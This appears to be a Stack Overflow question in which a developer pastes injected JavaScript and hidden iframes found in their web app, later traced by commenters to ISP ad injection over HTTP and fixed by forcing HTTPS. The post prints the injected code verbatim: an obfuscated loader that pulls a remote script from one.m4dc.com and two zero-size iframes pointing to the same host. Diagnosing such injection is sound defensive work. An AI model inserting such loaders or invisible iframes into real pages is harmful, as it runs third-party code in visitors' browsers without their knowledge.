# Some scripts and pages of my web app hosted on AWS are somehow being modified

Tags: javascript, html, amazon-web-services

One of my web apps hosted on AWS, when loaded on Microsoft Edge, prompts for downloading a 14 bytes file named 't' from 'one.m4dc.com', which is not my domain. So I started inspecting my scripts and pages. Then I observed some very strange behaviours. Contents of one of my scripts named **pd-index.js** was replaced by the content given below.

```js
try {
 var esdmd51 = '1f4c5553ab20a8809f7f1724448c2f6e';
 var d = document;
 var esdfd5_uri = '<URL of my website>/js/pd-index.js?m4dc56=176712';
 if(0 != e6f744) {
  var e6f744 = 0;
  esdfd5 =! 0
 }
 else esdfd5 =! 1;

 function ldS(e,t) {
  var a = d.createElement("script");
  a.type = "text/javascript",
  a.readyState
  ?a.onreadystatechange = function() {
   "loaded"!=a.readyState && "complete" != a.readyState || (a.onreadystatechange=null,t())
  }
  :a.onload = function() {
   t()
  },
  a.src = e,
  d.getElementsByTagName("head")[0].appendChild(a)
 }

 try {
  vA = d.currentScript.async,
  vD = d.currentScript.defer
 }
 catch(e) {
  vA =! 0
 }

 vA || vD
 ?ldS(esdfd5_uri, function(){})
 :(
   d.write('<script id="esdfd576712" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),
   d.getElementById("esdfd576712") || ldS(sdfd5_uri, function(){})
  ),
  esdfd5 && ldS("http://one.m4dc.com/j/si.js", function(){})
}

catch(e) {}
```

All these code was written in a single line. I structured it in order to understand.

Another strange thing is that the body content of every page is getting appended with two div elements given below.

```html
<div>
  <iframe width="0px" height="0px" class="iifr" id="chk_frame" src="http://one.m4dc.com/i/si.html" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>

<div>
  <iframe width="0px" height="0px" class="iifr" id="hdr_ifr" src="http://one.m4dc.com/t/?r=0.7112356815203629" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
```

The prompt for file download happens only in Microsoft Edge. Firefox and Chrome didn't do that. But anyway, my script and pages are modified. I don't really understand what is happening. Looks like some kind of hack. There is no problem when the app is ran on localhost. Any help is appreciated.

Comment: Are these scripts being modified on the server itself, or are you only seeing these when examining the source on your browser?  Those would be two very different scenarios.

Comment: I think, on the server itself. If I access the scripts by it's URL, I'm getting the modified ones.

Comment: That proves nothing.  What you see when you access your scripts by the URLs could be done by your ISP, by anti-virus software, by malware on your computer, or a browser plugin... none of which are legitimate and acceptable, but all of which are possible.  You need to log into the server and examine the scripts.

Comment: I've checked it on the server. The scripts stays unmodified there.

Comment: Looks like its Airtel Broadband trying to inject ADs into any webpage which is loaded under the HTTP protocol. One more reason to ensure all your sites are running on HTTPS.

Answer (score 0, accepted):

Successfully blocked this attack by forcing https on all requests to the web application.

Comment: Hey @dilshad-roshan are you by any chance on airtel braodband? I am having same issue right now only when I am accessing the site view an airtel broadband network.

Comment: Yes. Mine is also Airtel broadband.